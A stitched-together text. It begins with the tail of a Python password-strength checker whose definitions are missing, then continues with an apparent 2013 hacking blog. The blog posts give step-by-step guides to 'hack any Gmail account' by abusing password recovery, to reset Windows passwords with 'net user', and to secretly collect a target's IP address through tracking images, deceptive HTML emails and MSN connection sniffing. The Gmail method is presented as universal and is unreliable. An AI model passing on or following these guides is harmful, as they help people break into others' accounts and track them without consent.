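KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890")

def has_run(pw, n=4):
    """True if pw contains n neighbouring keys of one row, in either direction."""
    low = pw.lower()
    for row in KEYBOARD_ROWS:
        for seq in (row, row[::-1]):
            if any(seq[i:i + n] in low for i in range(len(seq) - n + 1)):
                return True
    return False

def check_password(pw, personal=()):
    """Return the 'things to avoid' that pw violates, in the order of the list."""
    low = pw.lower()
    problems = []
    if low in LISTED_EXAMPLES:
        problems.append("listed as an example")
    if any(p and p.lower() in low for p in personal):
        problems.append("personal information")
    if any(word in low for word in DICTIONARY):
        problems.append("dictionary word")
    if has_run(pw):
        problems.append("keyboard pattern or sequential numbers")
    if pw.isdigit() or (pw.isalpha() and (pw.isupper() or pw.islower())):
        problems.append("single character class")
    if re.search(r"(.)\1", pw):
        problems.append("repeating characters")
    return problems

if __name__ == "__main__":
    # Constructed test inputs, including the list's own examples (asdf, 1234, aa11).
    for candidate in ("asdf1234", "aa11", "Luv 2 Laf", "7391650284", "gR7!tok-Zu4p"):
        print(repr(candidate), "->", check_password(candidate) or "no listed problem")
```

An empty result only means none of the listed mistakes was found; it says nothing about length or about whether the password is used elsewhere.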
posted by (HaXoR)
Tuesday, 23 July 2013
Hack Any Gmail account
Getting straight to the tut
Step 1: First sign out of your Gmail account.
Step 2: Go to the "I Cannot Access My Account" tab, which is below the password field.
Step 3: Go to Yopmail and enter any random name, e.g. ron, then click check inbox and leave it open.
Step 4: On the "I Cannot Access My Account" page in Gmail, just click forgot my username and go to the username recovery page.
Step 5: Enter the Yopmail email you just opened eg :
Step 6: Now click the check for new emails tab in Yopmail. You will get all the Gmail IDs associated with it, e.g. you'll get some Gmail IDs like xx@gmail.com. Copy that ID.
Step 7: Go again to "I Cannot Access My Account" in Gmail, and this time choose forgot my password and go to the password recovery page.
Step 8: Now enter the Gmail ID you copied (xx@gmail.com) in username, and fill in the captcha and everything.
Step 9: If the Gmail password recovery ever asks a security question, there is no need to panic! Look below the security question; there will be a tab link: send the reset password link to my recovery email.
Step 10: Go to the Yopmail inbox again, click on the link Gmail posted and reset their Gmail password.
VOILA!! You just hacked a Gmail account
Posted by (HaXoR)
Saturday, 20 July 2013
How to change the password of any pc without knowing the current one
Changing a Computer's User Password Without Knowing the Current Password
If you want to change the user password on your Windows computer but you don’t know what the current password is, there is an easy way to do this. First of all, the user that you are on has to be an administrator user. To determine what type of user you are logged in with, go to Start > Control Panel > User Accounts. At the bottom of the window you will see the different users that are on your computer. Find your user; under the user name it will say what type of user account you are. Your user needs to be a computer administrator to change the password without knowing the current password.
Let’s get started!
1. Click on the Start button and select “Run”. The Run window will appear. Type into it the text “cmd” (without the quotes). Click OK.
2. The CMD window will appear. Type “net user”. A list of all the users that are on the computer will appear.
3. Type the following: net user <enter user name here without these brackets> *
For example, if the user I want to change passwords for is Mike, I would type in:
net user Mike *
4. Press enter and you will be asked to type in a new password. Type in your new password. The cursor will not move, nor will it seem like anything is happening, but your new password will be entered.
5. You will be asked to confirm your new password. Enter it again and press enter.
Congratulations, you have just changed the password of your Windows user without knowing the current password!
Posted by (HaXoR)
Tuesday, 16 July 2013
How to know someone's IP address
In many cases, it's desired to know the IP address of someone in the reconnaissance phase. The first question to ask is: what information do I have about this person? In most cases it's possible that you have the email or IM of the target. First let's discuss the methods:
Method 1
If you have a web server hosted someplace where you can see its logs, then it's very easy to send someone a URL of an image or any webpage hosted on your web server (http://123.123.123.123/veryfunnyimage.jpg). Whenever this page is visited, the web server keeps a log of who visited that page (IP address, time, browser, OS ... and lots more info), which you can check later to collect IP addresses. if
Method 2
Sometimes people get freaked out by addresses that have IP addresses in the URL, so having your web server with a domain name would really help the person you sent the URL to press on the link (www.mywebsite.com/veryfunnyimage.jpg).
Method 3
Some paranoid people don't open links to unknown sites, so here comes the cool trick. You can embed the image in a post of yours on a known site that allows HTML tags with image sources like < img src = (your image URL). In this case the URL you are going to send to the person is a link to a known website, but the website contains another link to your web server. Whenever someone views this page on the known website, the "img src" link is invoked and voila! You have a log entry on your web server.
Method 4
Some ultra-paranoid people don't open links at all!! For these people I use my old trick. I send an email to the target that looks important to him (depending on the target, actually, and what's important to him). This email is in HTML format and contains a tag that links to an image on my web server (probably a white image, so as not to attract attention). Now upon merely opening the email, my web server is invoked and a log entry is saved about the person's current IP address.
Note that this method only works if the email client allows images to be displayed (Gmail disables that by default).
Method 5
A faster approach is IM. If you have the IM of the target, then it's possible to try to send him a file (not malicious, a picture or something). Upon sending the file, a direct connection is established between you and the target. With a simple connection monitoring application (e.g. netstat on Windows), you can know the IP address.
Method 6
Some paranoid people don't accept files! So another trick in the case of MSN is background sharing. The default for MSN is to accept backgrounds shared by others. Actually, background sharing performs file sending if the background is not one of the default backgrounds. So the trick is to set your background for the IM to a cool pic from your computer and share it. If the default setting was not altered on your target's IM, then he will automatically accept it right away and a connection is opened. Here again comes the connection monitoring app, where you can identify the new connection and extract the IP address of the target.
Well, those are the ones that I used. Do you have any other methods? Sometimes I only have the username on a forum or website. Any clues?
UPDATE:
Method 7
In MSN Messenger, if you don't have the display picture of the person you're talking to, the messenger will try to download it by default. This causes MSN to open a direct connection. Using a sniffing tool like Wireshark will allow you to know the IP of the remote person. So basically, if you don't have his display picture and you open the chat window, you'll get your log entry. You can either convince the target to change his/her display picture, or you can remove your local directory that caches the display pictures for all contacts (located in the application data folder for MSN) to force the messenger to redownload the picture.
Posted By (HaXoR)